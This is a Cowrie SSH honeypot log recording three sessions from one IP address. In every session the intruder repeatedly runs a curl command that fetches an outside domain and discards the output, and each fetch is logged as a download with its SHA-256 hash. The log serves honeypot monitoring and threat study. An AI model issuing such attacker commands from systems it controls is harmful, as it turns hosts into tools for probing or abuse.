{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.006009Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.007685Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.008325Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.043366Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.045395Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.048136Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.049846Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.050907Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.053951Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.054688Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.057076Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.057876Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.062976Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.141675Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.143826Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.145797Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.146369Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.148476Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.149234Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.150910Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.151455Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.187110Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.188235Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.189920Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.191118Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.193890Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.196269Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.198310Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.199325Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.200094Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.203893Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.231770Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.233454Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.234440Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.235258Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.238074Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.238931Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.240623Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.241373Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.273324Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.274307Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.274921Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.277457Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.278071Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.280535Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.281252Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.283897Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.312263Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.313102Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.316587Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.317755Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.318443Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.322286Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.344233Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.346371Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.347176Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.351492Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.352255Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.357131Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.359284Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.360204Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.363414Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.367420Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.392997Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.395433Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.397784Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.398626Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.399268Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.463669Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.464563Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.468362Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.470066Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.470701Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.502327Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.503146Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.506126Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.511581Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.513282Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.514001Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.516555Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.517235Z","src_ip":"212.227.125.160","session":"9f264c568782"}
